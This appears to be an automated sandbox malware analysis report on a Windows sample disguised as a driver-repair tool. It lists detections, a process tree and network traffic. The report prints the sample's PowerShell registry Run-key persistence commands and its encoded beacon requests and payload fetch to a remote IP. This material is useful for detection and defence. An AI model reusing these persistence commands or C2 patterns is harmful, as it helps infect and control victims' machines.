Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.zip

Overview

General Information

Sample Name:file.zip
Analysis ID:1314451
MD5:bfd4303cead7b992c6d8582bf00ebccd
SHA1:586a97c675f1abb8423dd05f731651add8d5a4e3
SHA256:26642f30dc75d56d3c7f3d5432b9906a320627e6681f387c72923a24f13484bb
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Connects to many ports of the same IP (likely port scanning)
Sample is not signed and drops a device driver
Uses known network protocols on non-standard ports
Suspicious powershell command line found
Drops large PE files
May check the online IP address of the machine
DLL side loading technique detected
Creates autostart registry keys with suspicious names
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Queries the installation date of Windows
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Creates driver files
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64_ra
  • file.exe (PID: 5020 cmdline: "C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe" MD5: 8CA18F31DB0E5051F432050162F94CFE)
    • ypkwfDriverDetectMastertvDriverRepairPro.exe (PID: 948 cmdline: "C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe" MD5: 4F2321A7D7EC44F7A6EF21D43CF4D470)
      • cmd.exe (PID: 4164 cmdline: cmd.exe /C powershell.exe -Command ""Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'"" MD5: 4943BA1A9B41D69643F69685E35B2943)
        • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
        • powershell.exe (PID: 5028 cmdline: powershell.exe -Command ""Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'"" MD5: BCC5A6493E0641AA1E60CBF69469E579)
      • cmd.exe (PID: 5240 cmdline: cmd.exe /C powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'"" MD5: 4943BA1A9B41D69643F69685E35B2943)
        • conhost.exe (PID: 1228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
        • powershell.exe (PID: 2608 cmdline: powershell.exe -Command ""Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'"" MD5: BCC5A6493E0641AA1E60CBF69469E579)
      • powershell.exe (PID: 2856 cmdline: powershell.exe -Command "Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 2824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 4648 cmdline: powershell.exe -Command "Set-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe'" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\SysWOW64\wininet.dll
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.418_none_5f5edc43821bf931
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\SysWOW64\winspool.drv
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\SysWOW64\oleacc.dll
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\SysWOW64\winmm.dll
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeFile opened: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.418_none_2e73e95e27897f63\COMCTL32.dll

Networking

barindex
Connects to many ports of the same IP (likely port scanning)
Source: global trafficTCP traffic: 18.230.148.111 ports 30281,1,3,157,4,8,4318
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 4318
Source: unknownNetwork traffic detected: HTTP traffic on port 4318 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 30281
Source: unknownNetwork traffic detected: HTTP traffic on port 30281 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 4318
Source: unknownNetwork traffic detected: HTTP traffic on port 4318 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 157
Source: unknownNetwork traffic detected: HTTP traffic on port 157 -> 49739
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDNS query: name: ip-api.com
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeDNS query: name: ip-api.com
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeDNS query: name: ip-api.com
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /*VVXCGVV$@UVP*SCC$W*Q$@UQCPU)SS$*PQS)T)X@QP@,STU*)SP$VQ)P)C)$GQW$PQ)$SX%25WVSQPG%25$TPW%25XXGGSG$QU@PW%25TVG*GQG)PQ**CQQ%25,XTSX,QUP$PQU)CGCW$)%25VCPG@Q%25PQPC%25VTVUCT*G)G$,UXC%25CQV,%25)TSVQ*CUX%25,SQP),,QS*QU)@V@@WVSCPS$PT,XQVCV)W$GPGGVC%25*GPGW%25PU@*VVT$%25T@QV,PTQ%25VSG)PUUTW*GS@PP,SUVCW%25XSS*WS@$%25TTX$WXV,$,W)V,PCWS))UV,$TTTUW@Q,$TXWV*U,@VCT,VTV)VSW@*W%25VXC%25VG)S@VPPPSC@,,Q)PT@*WW*QU*PP@QSGPUCCGCGTGQ*WX@WP@@VCVG)*Q%25*)Q,C$)WQUPQPT%25SGGWC%25*UPPW$XXXSP$)T)W)%25TXUGX)PUWCS%25CQP,@T@VXCTP*,SU%25P,WT*%25@SC)VU$WVQ%25WU)P))$)TG@,GVS,*QW@XWU,CT*%25VSUCCSCCGWUGQC%25)$WUV%25@P*@U$@WS@,VXQWC%25@US,$S%25,%25Q*$*$CXCW)%25GS@*$T,@QSW$QUTPX$GQV*STG*%25XXWQW@G@WX*QCU*)QWPCP)*XUT%25W)XV%25Q$G@,*XCWV%25UTCVXVS@)S@CVP$@VS%25%25CW)QSCT,PX@QQCC@QSW@GGV,@V$$XWC*,X@*VUCP),%25XWQ%25$UGG%25SGG$*U)C,)WSP%25*T**,XCUP$CT*QX*UVSCUP*@QSS,SQVC%25@$VVCQ$VV@$PXTTXVCWP%25CUQ)XP,*%25T@GG*XUPCVPW%25XWW@XS$*$U),GQC,STGV*)CWP*VUP,%25XVG*,SUVCPV*$XQX,SST$PV$*XU$PT)GV)*SV%25)UGG%25,UXC%25)Q*CSQGQWX@X,VUU,GS,C,)CWT%25CV)%25T%25USQPCP%25C@,V HTTP/1.1Accept: */*Accept-Encoding: gzipHost: 18.230.148.111:4318User-Agent: Mozilla/4.0 (compatible; Clever Internet Suite)Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /mxpLHRYdU.xml HTTP/1.1Host: 18.230.148.111:30281Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /PU$@SS$GW,GQCPCQGVCS,$WG$SG*WC,VQ)$QX$XCX**XGT*UU)$%25T%25SVC)@W*PW)%25TVQ)*SW,SXTG)PQ)XUTCWPQPVP,%25QT)U$@GC@@GGT%25GXWUV),G$P$@XC,@UCX@W$*$PUWPS$*X)UC)XVQ%25PG@)XGUTUQW@GSW,,WPX@G$C,)XVCP,)SGTVXWGWWSV$,X*QQ,QTS)V@P@C%25VX$X$TXT,U$)%25XQQS*)S)PT)W)PS@PU),**Q)C$$TG,T*G$,PWUW@V)P$GX%25WV@$,TQX*UTC@*@X$TP)C%25TG%25)C)%25Q@%25)SX*VG,VGW$U,@TSP,SQW$,XXU%25*UTS)%25W%25GP)$UQCV)TQ**VUG$GQ$PC)SC*VV,WT@S$CS,TQXP$CT$%25W))V))%25PXSTWGQWXT$TSWUVW$SUQPG)Q)@UX%25,WU*G*SQ)$PWPW,UQ,VQSPS$GTQX*VC%25XT@Q,$VV)V$CX%25W)VP*@GCGSW%25VQPCP@T)PV,@%25US@X@UW%25)PW%25,XT**WSW%25WV)@%25WC%25,UU,QXGV*CX$$W%25WUW$,CQ%25,QTWG$@VW@WW@V@*UVCVSU%25)QW,XT$)XV$*%25U$))XSG),TVX%25XGCW,*%25TP%25X)S)UGCST,XVXVXC%25CGVX,%25%25$C@C)C))SS%25*VXCU%25$PGCV@,@QS%25)S)$GS$CTP%25CTGV,GXTTTUSC$@*VW,,U%25$VX*W$WSWC)Q%25VVP),QX,GGP$,UP$@QC)TV@%25UST,,U@)S%25@XPGWWPUP,VTU%25CTWT*W*WTW$)*GQ@CV,,WXSQS%25GUCP@C)C),TT$GP$TGGXCWS))W,SP%25GVT)XST$)U@$$U%25,*Q,,GX*WW*QQ@$XTC*%25XXUP$ST)TTTQVT,)QG,SXQGV$SWX)@GW*VUQ$WQ$%25VUTV$%25)X$VV@Q)*QSCU),X*GS*@X,V)*CU$C@P*%25P*SS)*%25TP*CXGXWX)W%25UX$$G,PUPGPCC*)WG@)CVG%25PUXCCSQ%25,U,%25U@PWX)TTQ)U*UXGU*),))UQ,UU@,,T**,TTQ@,*UWCS@G*)XTW@%25SV$*SX,WWV*%25UVV,QXWTGUCP*%25X%25@UPCPVT$*QC*X)T)GW,@$)PUUC,SGWXS)CV%25SV)XPSX*CTUXXWWXUWXT$V%25V@,TV***STCW)T)@GT)GV*,QXQWCCQWS)V*CX*QWPT*XT$%25VQ)*TUW$CX)QPPS@)WSVS@UCS@Q$)WXS*,TWTVT,)XPTP*CWTGP@%25),GW*UUQ)VUX,)U,,TSS HTTP/1.1Accept: */*Accept-Encoding: gzipHost: 18.230.148.111:4318User-Agent: Mozilla/4.0 (compatible; Clever Internet Suite)Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /XQUC*GUW@%25)VT)TGVP$CUV@UQPP$CUV)XTTPQ,,,QGP@$QT*G%25G**%25TUSP,STVQXC@),GQW@G*@@ST$XX)*UU),$W,SVPX*WGU,)SS,PUVP%25G)G$,)XPVX$UQQ,$QCP*,PCG*%25Q@,XTQQWC$)X)W%25GXQQWG%25XSXQGX%25PUQ$PX,VC,)XWVU,%25XPQ)$QUQPPP@CQ,$S%25C,G,*,SXC*WQWQW)G)SX,*UU$QQS%25%25GG,%25U*C,*)XCXXXCGCSUCC)CS@P$$CTCS@C,WT%25*VT,CQT*XGS*,XSWSW,@$*UX@Q$$WT%25)*VWWQQCCV$,V,UT@C)VTGX$UX,%25QQPU%25,XWTQS*CTP$),U,%25SVX@,@C*GXPVW,XT**XXQG%25)PSC$QUCPV@WW%25GGSXPWCU))@$@,@V)QGW%25SXQTGWQX@W$P$,UTWTQW)GP,CQ%25)V@QWU%25)VP@@CTGV*SX*QT,TU,C%25VW)XPW%25G$CQ%25P@P%25@TS,C))WVVSWCPVV%25)XXQ%25$CTWQ,@G@W)WS)C%25*PU,%25Q)CGXCP*$W$$*XCX*%25)V@XVGT*PT@)U)TTVT*,VXUWCTSGCG$)*TGWTW,@,V)$VX)GTGG*GX@U$@*VC$TQGQVCS$SX)Q,@,W$$%25W)%25T$PVXGTGTWGWCXUS$CW*QT$UX)VS$%25S@VWCCWS*$XUV*WU%25@CV,)X*@QTCT)C)Q@,%25VQU$*XWS$C*@X*QTPT)QGPS$QU),CGX%25VVP*TQTPP@U$VSWPV$,TTX)G*,$VPW)*$UQPX,,XUVQ,WU$)CWPXXG*)Q@UPU*SQG$%25GQ,$V%25CPGU@)*)VU%25QG@,QQS*TXUUS,QQU,VX%25WG*UQ)$$W@,$T*S$P%25$TQP,$Q$CSG*%25$U%25),U,@PWG@@@%25S,C@)QX%25GQXVUX*GXTQS$,WVSQ,TQPCX)SSGP,C,))SC%25,UQPU,%25UW@GSSC,@U@QPU*UQU@SG$*)WXGVW)@W%25TV)$XWPWT*CUWC*WUXPVTCWGT@%25*@T,SPPS,WT$TPX@S,,%25X,WXUC*@VT%25VSG@)UTC@SQ$$XVWXG%25@G@*)$Q@C$),%25VSTPVP,VV%25VUS)T*VVVWWWW)%25T%25TS*GUT@SUW,CXSUV@S,W@,))GCG,,XVQ*$S$P%25P@@TP%25C,CT*WUQ$UUQ$PTQGT$XVWP*GW@U*VTXQ$$WV,CWSPC,C%25VCCQCU,VXPGQ@$GXV@%25PSW@$SVCTC*,@U)@TVW*,T,U*PV*XQTCX)T@*V%25,CQT$TUS$P HTTP/1.1Accept: */*Accept-Encoding: gzipHost: 18.230.148.111:157User-Agent: Mozilla/4.0 (compatible; Clever Internet Suite)Connection: Keep-Alive
Source: global trafficTCP traffic: 192.168.2.2:49731 -> 18.230.148.111:4318
Source: global trafficTCP traffic: 192.168.2.2:49737 -> 52.67.27.221:9881
Source: global trafficTCP traffic: 192.168.2.2:49740 -> 18.228.7.23:4317
Source: global trafficTCP traffic: 192.168.2.2:49741 -> 18.228.39.40:4317
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownDNS traffic detected: queries for: ip-api.com
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /*VVXCGVV$@UVP*SCC$W*Q$@UQCPU)SS$*PQS)T)X@QP@,STU*)SP$VQ)P)C)$GQW$PQ)$SX%25WVSQPG%25$TPW%25XXGGSG$QU@PW%25TVG*GQG)PQ**CQQ%25,XTSX,QUP$PQU)CGCW$)%25VCPG@Q%25PQPC%25VTVUCT*G)G$,UXC%25CQV,%25)TSVQ*CUX%25,SQP),,QS*QU)@V@@WVSCPS$PT,XQVCV)W$GPGGVC%25*GPGW%25PU@*VVT$%25T@QV,PTQ%25VSG)PUUTW*GS@PP,SUVCW%25XSS*WS@$%25TTX$WXV,$,W)V,PCWS))UV,$TTTUW@Q,$TXWV*U,@VCT,VTV)VSW@*W%25VXC%25VG)S@VPPPSC@,,Q)PT@*WW*QU*PP@QSGPUCCGCGTGQ*WX@WP@@VCVG)*Q%25*)Q,C$)WQUPQPT%25SGGWC%25*UPPW$XXXSP$)T)W)%25TXUGX)PUWCS%25CQP,@T@VXCTP*,SU%25P,WT*%25@SC)VU$WVQ%25WU)P))$)TG@,GVS,*QW@XWU,CT*%25VSUCCSCCGWUGQC%25)$WUV%25@P*@U$@WS@,VXQWC%25@US,$S%25,%25Q*$*$CXCW)%25GS@*$T,@QSW$QUTPX$GQV*STG*%25XXWQW@G@WX*QCU*)QWPCP)*XUT%25W)XV%25Q$G@,*XCWV%25UTCVXVS@)S@CVP$@VS%25%25CW)QSCT,PX@QQCC@QSW@GGV,@V$$XWC*,X@*VUCP),%25XWQ%25$UGG%25SGG$*U)C,)WSP%25*T**,XCUP$CT*QX*UVSCUP*@QSS,SQVC%25@$VVCQ$VV@$PXTTXVCWP%25CUQ)XP,*%25T@GG*XUPCVPW%25XWW@XS$*$U),GQC,STGV*)CWP*VUP,%25XVG*,SUVCPV*$XQX,SST$PV$*XU$PT)GV)*SV%25)UGG%25,UXC%25)Q*CSQGQWX@X,VUU,GS,C,)CWT%25CV)%25T%25USQPCP%25C@,V HTTP/1.1Accept: */*Accept-Encoding: gzipHost: 18.230.148.111:4318User-Agent: Mozilla/4.0 (compatible; Clever Internet Suite)Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /mxpLHRYdU.xml HTTP/1.1Host: 18.230.148.111:30281Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)
Source: global trafficHTTP traffic detected: GET /PU$@SS$GW,GQCPCQGVCS,$WG$SG*WC,VQ)$QX$XCX**XGT*UU)$%25T%25SVC)@W*PW)%25TVQ)*SW,SXTG)PQ)XUTCWPQPVP,%25QT)U$@GC@@GGT%25GXWUV),G$P$@XC,@UCX@W$*$PUWPS$*X)UC)XVQ%25PG@)XGUTUQW@GSW,,WPX@G$C,)XVCP,)SGTVXWGWWSV$,X*QQ,QTS)V@P@C%25VX$X$TXT,U$)%25XQQS*)S)PT)W)PS@PU),**Q)C$$TG,T*G$,PWUW@V)P$GX%25WV@$,TQX*UTC@*@X$TP)C%25TG%25)C)%25Q@%25)SX*VG,VGW$U,@TSP,SQW$,XXU%25*UTS)%25W%25GP)$UQCV)TQ**VUG$GQ$PC)SC*VV,WT@S$CS,TQXP$CT$%25W))V))%25PXSTWGQWXT$TSWUVW$SUQPG)Q)@UX%25,WU*G*SQ)$PWPW,UQ,VQSPS$GTQX*VC%25XT@Q,$VV)V$CX%25W)VP*@GCGSW%25VQPCP@T)PV,@%25US@X@UW%25)PW%25,XT**WSW%25WV)@%25WC%25,UU,QXGV*CX$$W%25WUW$,CQ%25,QTWG$@VW@WW@V@*UVCVSU%25)QW,XT$)XV$*%25U$))XSG),TVX%25XGCW,*%25TP%25X)S)UGCST,XVXVXC%25CGVX,%25%25$C@C)C))SS%25*VXCU%25$PGCV@,@QS%25)S)$GS$CTP%25CTGV,GXTTTUSC$@*VW,,U%25$VX*W$WSWC)Q%25VVP),QX,GGP$,UP$@QC)TV@%25UST,,U@)S%25@XPGWWPUP,VTU%25CTWT*W*WTW$)*GQ@CV,,WXSQS%25GUCP@C)C),TT$GP$TGGXCWS))W,SP%25GVT)XST$)U@$$U%25,*Q,,GX*WW*QQ@$XTC*%25XXUP$ST)TTTQVT,)QG,SXQGV$SWX)@GW*VUQ$WQ$%25VUTV$%25)X$VV@Q)*QSCU),X*GS*@X,V)*CU$C@P*%25P*SS)*%25TP*CXGXWX)W%25UX$$G,PUPGPCC*)WG@)CVG%25PUXCCSQ%25,U,%25U@PWX)TTQ)U*UXGU*),))UQ,UU@,,T**,TTQ@,*UWCS@G*)XTW@%25SV$*SX,WWV*%25UVV,QXWTGUCP*%25X%25@UPCPVT$*QC*X)T)GW,@$)PUUC,SGWXS)CV%25SV)XPSX*CTUXXWWXUWXT$V%25V@,TV***STCW)T)@GT)GV*,QXQWCCQWS)V*CX*QWPT*XT$%25VQ)*TUW$CX)QPPS@)WSVS@UCS@Q$)WXS*,TWTVT,)XPTP*CWTGP@%25),GW*UUQ)VUX,)U,,TSS HTTP/1.1Accept: */*Accept-Encoding: gzipHost: 18.230.148.111:4318User-Agent: Mozilla/4.0 (compatible; Clever Internet Suite)Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /XQUC*GUW@%25)VT)TGVP$CUV@UQPP$CUV)XTTPQ,,,QGP@$QT*G%25G**%25TUSP,STVQXC@),GQW@G*@@ST$XX)*UU),$W,SVPX*WGU,)SS,PUVP%25G)G$,)XPVX$UQQ,$QCP*,PCG*%25Q@,XTQQWC$)X)W%25GXQQWG%25XSXQGX%25PUQ$PX,VC,)XWVU,%25XPQ)$QUQPPP@CQ,$S%25C,G,*,SXC*WQWQW)G)SX,*UU$QQS%25%25GG,%25U*C,*)XCXXXCGCSUCC)CS@P$$CTCS@C,WT%25*VT,CQT*XGS*,XSWSW,@$*UX@Q$$WT%25)*VWWQQCCV$,V,UT@C)VTGX$UX,%25QQPU%25,XWTQS*CTP$),U,%25SVX@,@C*GXPVW,XT**XXQG%25)PSC$QUCPV@WW%25GGSXPWCU))@$@,@V)QGW%25SXQTGWQX@W$P$,UTWTQW)GP,CQ%25)V@QWU%25)VP@@CTGV*SX*QT,TU,C%25VW)XPW%25G$CQ%25P@P%25@TS,C))WVVSWCPVV%25)XXQ%25$CTWQ,@G@W)WS)C%25*PU,%25Q)CGXCP*$W$$*XCX*%25)V@XVGT*PT@)U)TTVT*,VXUWCTSGCG$)*TGWTW,@,V)$VX)GTGG*GX@U$@*VC$TQGQVCS$SX)Q,@,W$$%25W)%25T$PVXGTGTWGWCXUS$CW*QT$UX)VS$%25S@VWCCWS*$XUV*WU%25@CV,)X*@QTCT)C)Q@,%25VQU$*XWS$C*@X*QTPT)QGPS$QU),CGX%25VVP*TQTPP@U$VSWPV$,TTX)G*,$VPW)*$UQPX,,XUVQ,WU$)CWPXXG*)Q@UPU*SQG$%25GQ,$V%25CPGU@)*)VU%25QG@,QQS*TXUUS,QQU,VX%25WG*UQ)$$W@,$T*S$P%25$TQP,$Q$CSG*%25$U%25),U,@PWG@@@%25S,C@)QX%25GQXVUX*GXTQS$,WVSQ,TQPCX)SSGP,C,))SC%25,UQPU,%25UW@GSSC,@U@QPU*UQU@SG$*)WXGVW)@W%25TV)$XWPWT*CUWC*WUXPVTCWGT@%25*@T,SPPS,WT$TPX@S,,%25X,WXUC*@VT%25VSG@)UTC@SQ$$XVWXG%25@G@*)$Q@C$),%25VSTPVP,VV%25VUS)T*VVVWWWW)%25T%25TS*GUT@SUW,CXSUV@S,W@,))GCG,,XVQ*$S$P%25P@@TP%25C,CT*WUQ$UUQ$PTQGT$XVWP*GW@U*VTXQ$$WV,CWSPC,C%25VCCQCU,VXPGQ@$GXV@%25PSW@$SVCTC*,@U)@TVW*,T,U*PV*XQTCX)T@*V%25,CQT$TUS$P HTTP/1.1Accept: */*Accept-Encoding: gzipHost: 18.230.148.111:157User-Agent: Mozilla/4.0 (compatible; Clever Internet Suite)Connection: Keep-Alive

System Summary

barindex
Drops large PE files
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile dump: mxpLHRYdU.exe.9.dr 412135424Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeSection loaded: inetres.dll
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeSection loaded: inetres.dll
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeFile created: C:\ProgramData\ypkiExpertDriverToolkit\MouseA.sys
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe "C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe"
Source: C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exeProcess created: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe "C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe"
Source: C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell.exe -Command ""Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'""
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command ""Set-ItemProperty -Path HKLM:\Software\Microsoft\Windows\CurrentVersion\Run -Name AMDDefaultValueCPUK.N0P/24#$YA -Value 'C:\ProgramData\ypkiExpertDriverToolkit\ypkwfDriverDetectMastertvDriverRepairPro.exe /runas'""
